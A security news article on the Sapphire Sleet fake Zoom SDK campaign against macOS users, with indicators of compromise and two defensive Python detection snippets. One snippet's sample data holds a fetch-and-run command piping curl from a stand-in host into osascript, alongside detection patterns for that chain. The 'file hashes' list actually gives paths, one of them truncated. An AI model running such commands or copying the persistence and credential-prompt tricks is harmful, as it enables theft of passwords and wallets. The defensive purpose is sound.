Beware: Fake Zoom SDK Update Delivers Sapphire Sleet Malware to macOS Users
A sophisticated cyberattack campaign has emerged, targeting macOS users through a deceptive Zoom Software Development Kit (SDK) update. The North Korean-linked threat actor, Sapphire Sleet, employs social engineering tactics to infiltrate systems and exfiltrate sensitive data, including passwords, cryptocurrency assets, and personal information.
The Deceptive Approach
Unlike traditional cyberattacks that exploit software vulnerabilities, this campaign relies on manipulating human behavior. Sapphire Sleet initiates contact by masquerading as a job recruiter on professional networking platforms. They engage potential victims in career-related discussions, building trust over time. Once rapport is established, the attacker schedules a fictitious technical interview, during which the victim is prompted to download a file named Zoom SDK Update.scpt.
Execution of the Attack
The downloaded file is a compiled AppleScript that opens in macOS’s native Script Editor application—a trusted and legitimate tool. This trustworthiness allows the script to bypass macOS’s built-in security measures without raising immediate red flags. The script presents what appears to be routine upgrade instructions, but hidden beneath thousands of blank lines lies malicious code poised for execution.
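A triage heuristic for the padding trick described above, added here as an example and not code from the article or from Microsoft: given AppleScript source text (for a compiled .scpt, the text would first be recovered with macOS's osadecompile), it finds the longest run of blank lines and returns whatever code sits below it. The sample script is constructed.

```python
# Constructed sample: a benign-looking first line, thousands of blank lines,
# then a placeholder line standing in for code hidden below the visible area.
SAMPLE_SCRIPT = (
    'display dialog "Zoom SDK update: please wait while components refresh."\n'
    + "\n" * 3000
    + 'do shell script "echo constructed-placeholder-stage"\n'
)

# Hand-written scripts rarely contain hundreds of consecutive blank lines;
# the threshold is an assumption, tune it to your own corpus.
BLANK_RUN_THRESHOLD = 200


def longest_blank_run(text):
    """Return (length, start_index) of the longest run of consecutive blank lines."""
    best_len, best_at, run, run_at = 0, 0, 0, 0
    for idx, line in enumerate(text.splitlines()):
        if line.strip() == "":
            if run == 0:
                run_at = idx
            run += 1
            if run > best_len:
                best_len, best_at = run, run_at
        else:
            run = 0
    return best_len, best_at


def hidden_code_after_padding(text, threshold=BLANK_RUN_THRESHOLD):
    """Non-blank lines that follow a suspiciously long blank run, or [] if none."""
    length, start = longest_blank_run(text)
    if length < threshold:
        return []
    lines = text.splitlines()
    return [line for line in lines[start + length:] if line.strip()]
```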
Microsoft’s Analysis and Response
Microsoft Threat Intelligence analysts have identified this campaign and noted that the specific combination of execution patterns, including the use of AppleScript as a dedicated credential-harvesting component, is unprecedented for Sapphire Sleet. Upon discovery, Microsoft responsibly disclosed their findings to Apple. In response, Apple has deployed XProtect signature updates and enhanced Safari’s Safe Browsing protections to detect and block infrastructure associated with this campaign.
Targeted Sectors and Data Exfiltration
Sapphire Sleet primarily focuses on individuals and organizations within the cryptocurrency, finance, venture capital, and blockchain sectors. Once the malware is active, it systematically harvests a wide array of sensitive information, including:
– User login passwords
– Telegram session data
– Browser credentials
– Cryptocurrency wallet keys from applications like Ledger Live and Exodus
– SSH keys
– macOS keychain databases
The collected data is then compressed and stealthily uploaded to attacker-controlled servers over port 8443.
Bypassing macOS Security Measures
The malware adeptly circumvents macOS security layers, including Gatekeeper and Transparency, Consent, and Control (TCC). By persuading the user to manually execute the file, Sapphire Sleet shifts the execution context to a user-initiated process. This strategic move allows the malware to operate without triggering standard security alerts, underscoring the critical importance of user vigilance.
Detailed Infection Chain
Upon opening the deceptive file, the attack progresses through a rapid sequence of commands:
1. Initial Execution: The script invokes the legitimate macOS softwareupdate binary with an invalid parameter to mimic a genuine system process.
2. Payload Retrieval: It utilizes the curl command to fetch a remote AppleScript payload, which is then passed directly to the osascript interpreter.
This pattern repeats across five stages, each identified by its own user-agent string (mac-cur1 through mac-cur5), enabling Sapphire Sleet to manage payload delivery and track the campaign’s progress.
Persistence Mechanisms
The mac-cur1 stage acts as the orchestrator, collecting system details, registering the infected machine with the command-and-control servers, and deploying a monitoring binary named com.apple.cli. Simultaneously, a backdoor called services installs a launch daemon named com.google.webkit.service.plist. This daemon is designed to closely resemble legitimate Apple and Google services, ensuring it persists across system reboots without drawing attention.
Credential Harvesting
In the mac-cur2 stage, the malware delivers a credential harvester named systemupdate.app. This component displays a native password dialog identical to a legitimate system prompt. When the unsuspecting user enters their credentials, the malware captures and exfiltrates this sensitive information.
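Detection logic for the infection chain, persistence and harvester stages described above, added here as an example and not code from the article or from Microsoft: it runs over constructed process-execution records (not real telemetry) and flags curl output piped into osascript, the staged mac-cur user-agents, softwareupdate launched from Script Editor, and launchctl referencing the impersonating daemon plist. Field names and the sample URL are assumptions.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    name: str
    cmdline: str


# Constructed sample telemetry: a Script Editor session launching the staged
# chain, a persistence install, and one benign curl for contrast.
EVENTS = [
    ProcEvent(100, 1, "Script Editor", "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"),
    ProcEvent(101, 100, "softwareupdate", "softwareupdate --not-a-real-option"),
    ProcEvent(102, 100, "sh", "sh -c curl -A mac-cur1 https://example.invalid/stage | osascript"),
    ProcEvent(103, 1, "curl", "curl -A Mozilla/5.0 https://example.invalid/feed"),
    ProcEvent(104, 1, "launchctl", "launchctl load /Library/LaunchDaemons/com.google.webkit.service.plist"),
]

STAGE_UA = re.compile(r"mac-cur[1-5]")
PIPE_TO_OSASCRIPT = re.compile(r"curl\b.*\|\s*osascript")
# Persistence artifact name the article associates with the campaign.
IMPERSONATING_PLISTS = {"com.google.webkit.service.plist"}


def flag_events(events):
    """Return (pid, reason) pairs for events matching the campaign's execution pattern."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        from_editor = parent is not None and parent.name == "Script Editor"
        if PIPE_TO_OSASCRIPT.search(e.cmdline):
            reason = "curl output piped into osascript"
            ua = STAGE_UA.search(e.cmdline)
            if ua:
                reason += " with staged user-agent " + ua.group(0)
            if from_editor:
                reason += " spawned from Script Editor"
            findings.append((e.pid, reason))
        elif e.name == "softwareupdate" and from_editor:
            findings.append((e.pid, "softwareupdate launched from Script Editor"))
        elif e.name == "launchctl" and any(p in e.cmdline for p in IMPERSONATING_PLISTS):
            findings.append((e.pid, "launchctl referencing impersonating daemon plist"))
    return findings
```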
Indicators of Compromise
To assist in identifying potential infections, the following indicators of compromise have been associated with this campaign:
– Malicious File Hashes:
  – /Users/
  – services / icloudz
  – com.google.chromes.updaters
  – com.google.webkit.service.plist
  – /private/tmp/SystemUpdate/systemupdate.app/Contents/MacOS/Mac Password Popup
  – /private/tmp/SoftwareUpdate/softwareupdate.app/Contents/MacOS/Mac Password Popup
– Domains and IP Addresses:
  – uw04webzoom[.]us
  – check02id[.]com
Protective Measures
To safeguard against such sophisticated attacks, users are advised to:
– Verify Sources: Always download software updates from official and trusted sources.
– Exercise Caution: Be wary of unsolicited communications, especially those prompting the download of files or software.
– Stay Updated: Ensure that your operating system and security software are up to date to benefit from the latest protective measures.
– Educate and Train: Regularly participate in cybersecurity awareness training to recognize and respond to social engineering tactics effectively.
By remaining vigilant and adhering to these best practices, users can significantly reduce the risk of falling victim to such deceptive and harmful campaigns.